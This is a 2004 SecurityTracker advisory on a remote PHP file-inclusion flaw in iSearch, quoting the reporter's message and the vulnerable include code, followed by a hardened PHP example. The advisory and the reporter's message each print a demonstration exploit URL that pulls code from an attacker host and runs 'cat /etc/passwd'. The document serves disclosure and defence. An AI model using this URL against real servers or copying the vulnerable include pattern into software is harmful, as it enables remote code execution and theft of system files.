SecurityTracker.com

SecurityTracker
Archives
Category:   Application (Generic)  >   iSearch
Vendors:   Willis, Ian
iSearch Include File Holes Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1008900
SecurityTracker URL:  http://securitytracker.com/id/1008900
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 2 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   taktau at taktau.cc reported an include file vulnerability in iSearch. A remote user can execute arbitrary PHP code and operating system commands on the target system.

It is reported that 'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:

isearch_core.inc.php
isearch_spider.inc.php
isearch_search.inc.php

A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd

The author indicates that this vulnerability was reported by blackcobra-x.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.isearchthenet.com/isearch/index.php
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Vuln: iSearch


PHP Code Injection Vulnerabilities in iSearch

1. Summary
The iSearch PHP search engine allows you to build a
searchable database for your web site. Visitors can
search for key words and a list of any pages that match
is returned to them.

2. Vendor URL: http://www.isearchthenet.com/isearch/

3. PHP Injection
-- HTTP Request --

http://www.example.com/isearch/isearch.inc.php?isearch_path=http://attacker?&cmd=cat /etc/passwd

-- HTTP Request --

4. Code impacted: isearch.inc.php
<?php
/*blabla
..*/
include ("$isearch_path/isearch_core.inc.php");
include ("$isearch_path/isearch_spider.inc.php");
include ("$isearch_path/isearch_search.inc.php");

?>

reported by blackcobra-x
greetz to all bC-X crews, toyok aka phrack, r3dstorm

- taktau@taktau.cc -
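
The include pattern quoted in the message above takes its directory from a request-controllable variable. The following is an added example of a hardened form, not code from iSearch or from the reporter; the names ISEARCH_BASE, ISEARCH_INCLUDES and isearch_include() are hypothetical, and it assumes the three include files sit in the same directory as the script.

```php
<?php
declare(strict_types=1);

// Added example: ISEARCH_BASE, ISEARCH_INCLUDES and isearch_include() are
// hypothetical names chosen for illustration, not part of iSearch.

// The base directory is fixed by server-side code. It is never read from
// $_GET/$_POST/$_COOKIE and cannot be set through register_globals.
define('ISEARCH_BASE', __DIR__);

// The only files this entry point may pull in (file names from the advisory).
const ISEARCH_INCLUDES = [
    'isearch_core.inc.php',
    'isearch_spider.inc.php',
    'isearch_search.inc.php',
];

function isearch_include(string $name): void
{
    // Allowlist check: reject anything that is not an expected file name.
    if (!in_array($name, ISEARCH_INCLUDES, true)) {
        throw new RuntimeException("refusing to include unexpected file: $name");
    }

    // realpath() only resolves local filesystem paths: it returns false for
    // URLs and missing files, and it collapses ".." and symlinks so the
    // containment check below compares canonical paths.
    $base = realpath(ISEARCH_BASE);
    $path = realpath(ISEARCH_BASE . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("include path escapes base directory: $name");
    }

    require_once $path;
}

foreach (ISEARCH_INCLUDES as $file) {
    isearch_include($file);
}
```

As a second layer, keeping allow_url_include set to Off in php.ini (the default since PHP 5.2) stops include/require from fetching remote URLs, and register_globals no longer exists as of PHP 5.4.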



 
 



Copyright 2020, SecurityGlobal.net LLC